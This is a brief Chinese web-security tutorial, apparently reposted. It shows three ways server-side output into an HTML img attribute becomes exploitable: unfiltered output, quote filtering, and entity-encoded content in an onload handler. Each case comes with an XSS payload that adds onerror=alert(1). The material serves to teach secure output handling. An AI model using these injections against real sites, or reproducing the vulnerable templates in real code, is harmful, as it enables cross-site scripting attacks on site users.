没有过滤或转码直接输出 code: <img src=":{src}" > hack: <img src=" xxx:x"onerror=alert(1)// " > 过滤了单引号和双引号 code: <img src=:{src} > hack: <img src= xxx:x onerror=alert(1) > 对内容进行了HTML实体编码 code: <img src="xxx:x" onload="open(':{src}')" > hack: <img src=xxx:x onerror=" open (' ');alert(1)// ')" > final: <img src=xxx:x onerror=" open (' ');alert(1)// ')" >
查看更多关于服务端输出HTML属性的几种危险情况 - 网站安全的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did13708